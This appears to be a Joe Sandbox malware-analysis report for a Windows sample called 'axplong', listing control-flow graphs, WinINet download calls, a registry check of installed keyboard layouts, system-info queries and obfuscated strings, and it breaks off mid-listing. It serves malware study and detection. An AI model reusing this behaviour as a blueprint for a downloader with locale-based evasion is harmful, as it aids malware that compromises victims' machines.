13081->13079 13081->13080 13083 537338 13082->13083 13085 53733e 13083->13085 13086 537036 13083->13086 13085->13039 13087 537042 __dosmaperr 13086->13087 13092 53b87b 13087->13092 13089 537068 13089->13085 13090 53705a __dosmaperr 13090->13089 13091 53b87b RtlAllocateHeap 13090->13091 13091->13089 13095 53b6de 13092->13095 13094 53b894 13094->13090 13096 53b6ee 13095->13096 13098 53b6f5 13096->13098 13099 541ef8 13096->13099 13098->13094 13102 541d22 13099->13102 13101 541f0f 13101->13098 13103 541d54 13102->13103 13105 541d40 __cftof __dosmaperr 13102->13105 13104 53b568 RtlAllocateHeap 13103->13104 13103->13105 13104->13105 13105->13101 13600 51b7e9 13601 51b6e5 11 API calls 13600->13601 13602 51b811 Concurrency::details::_Reschedule_chore 13601->13602 13605 51b836 13602->13605 13607 51cade 13602->13607 13604 51b648 11 API calls 13606 51b84e 13604->13606 13605->13604 13608 51cafc 13607->13608 13609 51caec TpCallbackUnloadDllOnCompletion 13607->13609 13608->13605 13609->13608 13106 53d6ef 13107 53d6fc __fassign 13106->13107 13108 53d73a __dosmaperr 13107->13108 13109 53d727 RtlAllocateHeap 13107->13109 13109->13107 13109->13108

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 839 50bd60-50bdac 840 50c1a1-50c1c6 call 517f30 839->840 841 50bdb2-50bdb6 839->841 846 50c1f4-50c20c 840->846 847 50c1c8-50c1d4 840->847 841->840 843 50bdbc-50bdc0 841->843 843->840 845 50bdc6-50be4f InternetOpenW InternetConnectA call 517870 call 505b20 843->845 874 50be51 845->874 875 50be53-50be6f 845->875 851 50c212-50c21e 846->851 852 50c158-50c170 846->852 849 50c1d6-50c1e4 847->849 850 50c1ea-50c1f1 call 51d593 847->850 849->850 854 50c26f-50c274 call 536b9a 849->854 850->846 856 50c224-50c232 851->856 857 50c14e-50c155 call 51d593 851->857 859 50c243-50c25f call 51cf21 852->859 860 50c176-50c182 852->860 856->854 865 50c234 856->865 857->852 867 50c188-50c196 860->867 868 50c239-50c240 call 51d593 860->868 865->857 867->854 869 50c19c 867->869 868->859 869->868 874->875 878 50bea0-50bf0f call 517870 call 505b20 call 517870 call 505b20 875->878 879 50be71-50be80 875->879 892 50bf11 878->892 893 50bf13-50bf29 HttpSendRequestA 878->893 880 50be82-50be90 879->880 881 50be96-50be9d call 51d593 879->881 880->881 881->878 892->893 894 50bf5a-50bf82 893->894 895 50bf2b-50bf3a 893->895 898 50bfb3-50bfd4 InternetReadFile 894->898 899 50bf84-50bf93 894->899 896 50bf50-50bf57 call 51d593 895->896 897 50bf3c-50bf4a 895->897 896->894 897->896 903 50bfda 898->903 901 50bf95-50bfa3 899->901 902 50bfa9-50bfb0 call 51d593 899->902 901->902 902->898 904 50bfe0-50c090 call 534180 903->904
                                APIs
                                • InternetOpenW.WININET(00558D70,00000000,00000000,00000000,00000000), ref: 0050BDED
                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0050BE10
                                • HttpSendRequestA.WININET(?,00000000), ref: 0050BF1A
                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 0050BFCD
                                • InternetCloseHandle.WININET(?), ref: 0050C0A7
                                • InternetCloseHandle.WININET(?), ref: 0050C0AF
                                • InternetCloseHandle.WININET(?), ref: 0050C0B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandle$ConnectFileHttpOpenReadRequestSend
                                • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4V$invalid stoi argument$stoi argument out of range
                                • API String ID: 3632815558-96260405
                                • Opcode ID: 5e0e2a5bb513cb87c9e3c11b10bb0f06994ff862a31e1e87ba0c9c1cf98e8b8f
                                • Instruction ID: 6647464d0dc0e9a9a8d82d3aeb46a85257466f6528578a9e96112b2eacb4a100
                                • Opcode Fuzzy Hash: 5e0e2a5bb513cb87c9e3c11b10bb0f06994ff862a31e1e87ba0c9c1cf98e8b8f
                                • Instruction Fuzzy Hash: A6B1B2B16001199BEB24DF28CC89BAEBF79FF85304F5046A9E509972C2D7719AC0CF95
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpen
                                • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-V
                                • API String ID: 1466736760-4265184053
                                • Opcode ID: 0065747b909e5b2362eb49bbe05d6ccf698d82daa09d8ef283f848584fe2834a
                                • Instruction ID: 159b8f0d54d17518c1adebb5404832ab84adecc97f4122cf19e67c913e4f7fc1
                                • Opcode Fuzzy Hash: 0065747b909e5b2362eb49bbe05d6ccf698d82daa09d8ef283f848584fe2834a
                                • Instruction Fuzzy Hash: 6F23E071A001589BFB19DB28CD897DDBE76AB85304F5482D8E049AB2C2EB359FC4CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 916 505df0-505eee 922 505ef0-505efc 916->922 923 505f18-505f25 call 51cf21 916->923 925 505f0e-505f15 call 51d593 922->925 926 505efe-505f0c 922->926 925->923 926->925 928 505f26-5060ad call 536b9a call 51e080 call 517f30 * 5 RegOpenKeyExA 926->928 945 5060b3-506143 call 534020 928->945 946 506478-506481 928->946 972 506466-506472 945->972 973 506149-50614d 945->973 948 506483-50648e 946->948 949 5064ae-5064b7 946->949 953 506490-50649e 948->953 954 5064a4-5064ab call 51d593 948->954 950 5064e4-5064ed 949->950 951 5064b9-5064c4 949->951 957 50651a-506523 950->957 958 5064ef-5064fa 950->958 955 5064c6-5064d4 951->955 956 5064da-5064e1 call 51d593 951->956 953->954 959 50659e-5065a3 call 536b9a 953->959 954->949 955->956 955->959 956->950 967 506525-506530 957->967 968 50654c-506555 957->968 964 506510-506517 call 51d593 958->964 965 5064fc-50650a 958->965 964->957 965->959 965->964 976 506542-506549 call 51d593 967->976 977 506532-506540 967->977 969 506582-50659d call 51cf21 968->969 970 506557-506566 968->970 979 506578-50657f call 51d593 970->979 980 506568-506576 970->980 972->946 981 506460 973->981 982 506153-506187 RegEnumValueW 973->982 976->968 977->959 977->976 979->969 980->959 980->979 981->972 987 50644d-506454 982->987 988 50618d-5061ad 982->988 987->982 991 50645a 987->991 993 5061b0-5061b9 988->993 991->981 993->993 994 5061bb-50624d call 517c50 call 518090 call 517870 * 2 call 505c60 993->994 994->987
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                • API String ID: 0-3963862150
                                • Opcode ID: 93839f50018d07e36004e48f9325e1735d18010f258861a9e4125bd7b58997d3
                                • Instruction ID: af95bfb91550333958a5ae8432dd7683bd51bde59c9b6bcd95b25b05097f4210
                                • Opcode Fuzzy Hash: 93839f50018d07e36004e48f9325e1735d18010f258861a9e4125bd7b58997d3
                                • Instruction Fuzzy Hash: 74E17F71900219ABEB24DB94CC8DBDEBBB9BB44304F5041D9E409A7292DB74ABC5CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1004 507d00-507d82 call 534020 1008 507d88-507db0 call 517870 call 505b20 1004->1008 1009 50827e-50829b call 51cf21 1004->1009 1016 507db2 1008->1016 1017 507db4-507dd6 call 517870 call 505b20 1008->1017 1016->1017 1022 507dd8 1017->1022 1023 507dda-507df3 1017->1023 1022->1023 1026 507e24-507e4f 1023->1026 1027 507df5-507e04 1023->1027 1030 507e80-507ea1 1026->1030 1031 507e51-507e60 1026->1031 1028 507e06-507e14 1027->1028 1029 507e1a-507e21 call 51d593 1027->1029 1028->1029 1032 50829c call 536b9a 1028->1032 1029->1026 1036 507ea3-507ea5 GetNativeSystemInfo 1030->1036 1037 507ea7-507eac 1030->1037 1034 507e62-507e70 1031->1034 1035 507e76-507e7d call 51d593 1031->1035 1045 5082a1-5082a6 call 536b9a 1032->1045 1034->1032 1034->1035 1035->1030 1038 507ead-507eb6 1036->1038 1037->1038 1043 507ed4-507ed7 1038->1043 1044 507eb8-507ebf 1038->1044 1049 507edd-507ee6 1043->1049 1050 50821f-508222 1043->1050 1047 507ec5-507ecf 1044->1047 1048 508279 1044->1048 1052 508274 1047->1052 1048->1009 1053 507ee8-507ef4 1049->1053 1054 507ef9-507efc 1049->1054 1050->1048 1055 508224-50822d 1050->1055 1052->1048 1053->1052 1057 507f02-507f09 1054->1057 1058 5081fc-5081fe 1054->1058 1059 508254-508257 1055->1059 1060 50822f-508233 1055->1060 1063 507fe9-5081e5 call 517870 call 505b20 call 517870 call 505b20 call 505c60 call 517870 call 505b20 call 505640 call 517870 call 505b20 call 517870 call 505b20 call 505c60 call 517870 call 505b20 call 505640 call 517870 call 505b20 call 517870 call 505b20 call 505c60 call 517870 call 505b20 call 505640 1057->1063 1064 507f0f-507f6b call 517870 call 505b20 call 517870 call 505b20 call 505c60 1057->1064 1061 508200-50820a 1058->1061 1062 50820c-50820f 1058->1062 1067 508265-508271 1059->1067 1068 508259-508263 1059->1068 1065 508235-50823a 1060->1065 1066 508248-508252 1060->1066 1061->1052 1062->1048 1070 508211-50821d 1062->1070 1102 5081eb-5081f4 1063->1102 1089 507f70-507f77 1064->1089 1065->1066 1072 50823c-508246 1065->1072 1066->1048 1067->1052 1068->1048 1070->1052 1072->1048 1091 507f79 1089->1091 1092 507f7b-507f9b call 538a81 1089->1092 1091->1092 1098 507fd2-507fd4 1092->1098 1099 507f9d-507fac 1092->1099 1101 507fda-507fe4 1098->1101 1098->1102 1104 507fc2-507fcf call 51d593 1099->1104 1105 507fae-507fbc 1099->1105 1101->1102 1102->1050 1107 5081f6 1102->1107 1104->1098 1105->1045 1105->1104 1107->1058
                                APIs
                                • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00507EA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoNativeSystem
                                • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                • API String ID: 1721193555-2057465332
                                • Opcode ID: 854fe04d5905cc7a0b645a9b5b5924845a88e48cc9f24e0ba1c2bea35e47d083
                                • Instruction ID: 251ce9f797118bdfd988a519b974425c455504dc9c975a08a7c12424a51f72df
                                • Opcode Fuzzy Hash: 854fe04d5905cc7a0b645a9b5b5924845a88e48cc9f24e0ba1c2bea35e47d083
                                • Instruction Fuzzy Hash: A2D1F770E00A09ABDF14BB28CD4E7AD7F71BB85320F944298E4156B3C2DB755E858BD2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1142 536e01-536e36 GetFileType 1143 536eee-536ef1 1142->1143 1144 536e3c-536e47 1142->1144 1147 536ef3-536ef6 1143->1147 1148 536f1a-536f42 1143->1148 1145 536e69-536e85 call 534020 GetFileInformationByHandle 1144->1145 1146 536e49-536e5a call 537177 1144->1146 1157 536f0b-536f18 call 53740d 1145->1157 1163 536e8b-536ecd call 5370c9 call 536f71 * 3 1145->1163 1160 536e60-536e67 1146->1160 1161 536f07-536f09 1146->1161 1147->1148 1153 536ef8-536efa 1147->1153 1149 536f44-536f57 1148->1149 1150 536f5f-536f61 1148->1150 1149->1150 1166 536f59-536f5c 1149->1166 1155 536f62-536f70 call 51cf21 1150->1155 1153->1157 1158 536efc-536f01 call 537443 1153->1158 1157->1161 1158->1161 1160->1145 1161->1155 1178 536ed2-536eea call 537096 1163->1178 1166->1150 1178->1150 1181 536eec 1178->1181 1181->1161
                                APIs
                                • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00536E23
                                • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00536E7D
                                • __dosmaperr.LIBCMT ref: 00536F12
                                  • Part of subcall function 00537177: __dosmaperr.LIBCMT ref: 005371AC
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: File__dosmaperr$HandleInformationType
                                • String ID:
                                • API String ID: 2531987475-0
                                • Opcode ID: d091120f369144fd693f30d50b65bf60d8d44f21a5ad36dbfb7f919391d433e5
                                • Instruction ID: 949a8ccba5ca8122d67f3ac626706b9219ec6e50cce97205a64e53692a446c44
                                • Opcode Fuzzy Hash: d091120f369144fd693f30d50b65bf60d8d44f21a5ad36dbfb7f919391d433e5
                                • Instruction Fuzzy Hash: D2414BB5900249BBDB24EFB5E8459AFBFF9FF88300B10852DF556D3210EA30A944CB61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1360 53d4f4-53d515 call 51deb0 1363 53d517 1360->1363 1364 53d52f-53d532 1360->1364 1365 53d519-53d51f 1363->1365 1366 53d54e-53d55a call 53a688 1363->1366 1364->1366 1367 53d534-53d537 1364->1367 1368 53d543-53d54c call 53d43c 1365->1368 1369 53d521-53d525 1365->1369 1380 53d564-53d570 call 53d47e 1366->1380 1381 53d55c-53d55f 1366->1381 1367->1368 1370 53d539-53d53c 1367->1370 1385 53d58c-53d595 1368->1385 1369->1366 1372 53d527-53d52b 1369->1372 1373 53d572-53d582 call 537443 call 536b8a 1370->1373 1374 53d53e-53d541 1370->1374 1372->1373 1377 53d52d 1372->1377 1373->1381 1374->1368 1374->1373 1377->1368 1380->1373 1390 53d584-53d589 1380->1390 1382 53d6cb-53d6da 1381->1382 1388 53d5a2-53d5b3 1385->1388 1389 53d597-53d59f call 538c8b 1385->1389 1393 53d5b5-53d5c7 1388->1393 1394 53d5c9 1388->1394 1389->1388 1390->1385 1395 53d5cb-53d5dc 1393->1395 1394->1395 1397 53d64a-53d65a call 53d687 1395->1397 1398 53d5de-53d5e0 1395->1398 1407 53d6c9 1397->1407 1408 53d65c-53d65e 1397->1408 1400 53d5e6-53d5e8 1398->1400 1401 53d6db-53d6dd 1398->1401 1403 53d5f4-53d600 1400->1403 1404 53d5ea-53d5ed 1400->1404 1405 53d6e7-53d6fa call 53651d 1401->1405 1406 53d6df-53d6e6 call 538cd3 1401->1406 1410 53d602-53d617 call 53d4eb * 2 1403->1410 1411 53d640-53d648 1403->1411 1404->1403 1409 53d5ef-53d5f2 1404->1409 1424 53d708-53d70e 1405->1424 1425 53d6fc-53d706 1405->1425 1406->1405 1407->1382 1414 53d660-53d676 call 53a531 1408->1414 1415 53d699-53d6a2 1408->1415 1409->1403 1416 53d61a-53d61c 1409->1416 1410->1416 1411->1397 1439 53d6a5-53d6a8 1414->1439 1415->1439 1416->1411 1422 53d61e-53d62e 1416->1422 1429 53d630-53d635 1422->1429 1431 53d710-53d711 1424->1431 1432 53d727-53d738 RtlAllocateHeap 1424->1432 1425->1424 1430 53d73c-53d747 call 537443 1425->1430 1429->1397 1434 53d637-53d63e 1429->1434 1443 53d749-53d74b 1430->1443 1431->1432 1435 53d713-53d71a call 539c81 1432->1435 1436 53d73a 1432->1436 1434->1429 1435->1430 1450 53d71c-53d725 call 538cf9 1435->1450 1436->1443 1440 53d6b4-53d6bc 1439->1440 1441 53d6aa-53d6ad 1439->1441 1440->1407 1446 53d6be-53d6c6 call 53a531 1440->1446 1441->1440 1445 53d6af-53d6b2 1441->1445 1445->1407 1445->1440 1446->1407 1450->1430 1450->1432
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hpGS
                                • API String ID: 0-3330126124
                                • Opcode ID: 1c2b323cb3bd37f3ac89f926fe6493569767ee8573ab5eb40f3f9e33a43aa62c
                                • Instruction ID: 656a3a26c291881af68bedf3185840321238ddda98087a06bb1b789e6a752ea0
                                • Opcode Fuzzy Hash: 1c2b323cb3bd37f3ac89f926fe6493569767ee8573ab5eb40f3f9e33a43aa62c
                                • Instruction Fuzzy Hash: FE610372D002159BDF25AFA8F88A7EDBFB0FB95315F24411AE459AB290D6309D04CB71

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1454 5082b0-508331 call 534020 1458 508333-508338 1454->1458 1459 50833d-508365 call 517870 call 505b20 1454->1459 1460 50847f-50849b call 51cf21 1458->1460 1467 508367 1459->1467 1468 508369-50838b call 517870 call 505b20 1459->1468 1467->1468 1473 50838d 1468->1473 1474 50838f-5083a8 1468->1474 1473->1474 1477 5083d9-508404 1474->1477 1478 5083aa-5083b9 1474->1478 1479 508431-508452 1477->1479 1480 508406-508415 1477->1480 1481 5083bb-5083c9 1478->1481 1482 5083cf-5083d6 call 51d593 1478->1482 1485 508454-508456 GetNativeSystemInfo 1479->1485 1486 508458-50845d 1479->1486 1483 508427-50842e call 51d593 1480->1483 1484 508417-508425 1480->1484 1481->1482 1487 50849c-5084a1 call 536b9a 1481->1487 1482->1477 1483->1479 1484->1483 1484->1487 1492 50845e-508465 1485->1492 1486->1492 1492->1460 1496 508467-50846f 1492->1496 1497 508471-508476 1496->1497 1498 508478-50847b 1496->1498 1497->1460 1498->1460 1499 50847d 1498->1499 1499->1460
                                APIs
                                • GetNativeSystemInfo.KERNELBASE(?), ref: 00508454
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoNativeSystem
                                • String ID:
                                • API String ID: 1721193555-0
                                • Opcode ID: 985d76bb82ebcaa91cbe59c9d40b099aad965e51baec30eac48e165bfb22a2c2
                                • Instruction ID: e678fa418b6554c153989775436c42c05203060c95b73ec34d277dc36f17c166
                                • Opcode Fuzzy Hash: 985d76bb82ebcaa91cbe59c9d40b099aad965e51baec30eac48e165bfb22a2c2
                                • Instruction Fuzzy Hash: E5511B709002099BEF24EB68CD49BEDBF75BB45314F504698E845A72C2EF355E84CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1500 508a60-508ab7 GetTempPathA call 517870 1502 508abc-508af0 call 505b20 1500->1502 1505 508af7-508afc 1502->1505 1505->1505 1506 508afe-508b83 call 517f30 * 2 call 518150 1505->1506 1513 508bb4-508bd8 1506->1513 1514 508b85-508b94 1506->1514 1517 508c05-508c0e 1513->1517 1518 508bda-508be9 1513->1518 1515 508b96-508ba4 1514->1515 1516 508baa-508bb1 call 51d593 1514->1516 1515->1516 1521 508c58-508c5f call 536b9a 1515->1521 1516->1513 1519 508c10-508c1f 1517->1519 1520 508c3b-508c57 call 51cf21 1517->1520 1523 508bfb-508c02 call 51d593 1518->1523 1524 508beb-508bf9 1518->1524 1526 508c31-508c38 call 51d593 1519->1526 1527 508c21-508c2f 1519->1527 1523->1517 1524->1521 1524->1523 1526->1520 1527->1521 1527->1526
                                APIs
                                • GetTempPathA.KERNELBASE(00000104,?,BFE8E80A,?,00000000), ref: 00508AA7
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
